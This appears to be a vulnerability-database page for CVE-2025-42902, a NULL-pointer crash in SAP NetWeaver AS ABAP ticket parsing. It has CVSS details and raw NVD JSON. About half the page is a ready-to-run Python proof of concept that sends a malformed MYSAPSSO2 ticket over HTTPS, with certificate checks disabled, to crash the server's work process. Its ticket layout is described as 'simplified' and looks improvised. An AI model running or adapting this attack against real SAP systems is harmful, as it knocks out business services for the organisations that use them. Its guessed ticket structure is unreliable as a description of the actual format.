Security Vulnerability Report
CVE-2025-42902 CVSS 5.3 MEDIUM

CVE-2025-42902

Published: 2025-10-14 01:15:32
Last Modified: 2026-04-15 00:35:42

Description

Due to the memory corruption vulnerability in SAP NetWeaver AS ABAP and ABAP Platform, an unauthenticated attacker can send a corrupted SAP Logon Ticket or SAP Assertion Ticket to the SAP application server. This leads to a dereference of NULL which makes the work process crash. As a result, it has a low impact on the availability but no impact on the confidentiality and integrity.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

SAP NetWeaver AS ABAP
SAP NetWeaver AS ABAP Platform

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-42902 PoC - SAP NetWeaver AS ABAP Ticket Processing NULL Dereference
# This PoC demonstrates how to trigger the vulnerability by sending a malformed SAP Logon Ticket
# Note: This is for educational and authorized testing purposes only

import socket
import ssl
import struct
import sys

# SAP Logon Ticket / Assertion Ticket processing endpoint
# The ticket is typically sent via HTTP POST to the SAP application server
TARGET_HOST = "sap-target.example.com"
TARGET_PORT = 443  # HTTPS port for SAP NetWeaver


def craft_malformed_sap_ticket():
    """
    Craft a malformed SAP Logon Ticket that triggers NULL pointer dereference.
    The ticket structure is intentionally corrupted to cause memory issues
    during parsing by the SAP application server's ticket validation logic.
    """
    # SAP Logon Ticket base structure (simplified)
    # A valid ticket contains: version, ticket type, user info, validity, signature
    # By corrupting key fields, we trigger the NULL dereference vulnerability

    # Build a minimal ticket header with corrupted fields
    ticket = b""

    # Ticket version (corrupted/invalid version)
    ticket += struct.pack(">H", 0xFFFF)  # Invalid version number

    # Ticket type - SAP_LOGON_TICKET or SAP_ASSERTION_TICKET
    ticket += struct.pack(">H", 0x0003)  # Assertion ticket type

    # Corrupted length fields to trigger buffer overread
    ticket += struct.pack(">I", 0xFFFFFFFF)  # Extremely large length value

    # Malformed payload that will cause NULL pointer dereference
    # when the parser tries to validate and dereference internal pointers
    ticket += b"\x00" * 64  # Null bytes to trigger NULL dereference

    # Invalid signature placeholder
    ticket += b"\x00" * 32

    return ticket


def send_malformed_ticket(host, port, ticket_data):
    """
    Send the malformed ticket to the SAP application server via HTTPS POST.
    The ticket is sent in the MYSAPSSO2 cookie or as part of the authentication header.
    """
    # Construct HTTP POST request with malformed ticket in MYSAPSSO2 cookie
    http_request = f"""POST /sap/bc/soap/rfc HTTP/1.1\r
Host: {host}\r
Content-Type: text/xml; charset=utf-8\r
Cookie: MYSAPSSO2={ticket_data.hex()}\r
Content-Length: 0\r
Connection: close\r
\r
""".encode()

    try:
        # Create SSL context for HTTPS connection
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE

        # Connect to SAP application server
        with socket.create_connection((host, port), timeout=10) as sock:
            with context.wrap_socket(sock, server_hostname=host) as ssock:
                # Send the malicious request
                ssock.send(http_request)

                # Receive response (server may crash during processing)
                try:
                    response = ssock.recv(4096)
                    print(f"[*] Response received: {response[:100]}")
                    print("[*] Server processed the request (may have crashed work process)")
                except socket.timeout:
                    print("[*] Connection timeout - possible work process crash")
                except ConnectionResetError:
                    print("[*] Connection reset - work process likely crashed")
    except Exception as e:
        print(f"[!] Error: {e}")


def main():
    print(f"[*] CVE-2025-42902 PoC - SAP NetWeaver AS ABAP NULL Dereference")
    print(f"[*] Target: {TARGET_HOST}:{TARGET_PORT}")

    # Craft the malformed ticket
    ticket = craft_malformed_sap_ticket()
    print(f"[*] Malformed ticket crafted ({len(ticket)} bytes)")

    # Send to target
    send_malformed_ticket(TARGET_HOST, TARGET_PORT, ticket)
    print("[*] Attack completed - check target for work process crash")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-42902", "sourceIdentifier": "[email protected]", "published": "2025-10-14T01:15:31.960", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to the memory corruption vulnerability in SAP NetWeaver AS ABAP and ABAP Platform, an unauthenticated attacker can send a corrupted SAP Logon Ticket or SAP Assertion Ticket to the SAP application server. This leads to a dereference of NULL which makes the work process crash. As a result, it has a low impact on the availability but no impact on the confidentiality and integrity."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://me.sap.com/notes/3627308", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}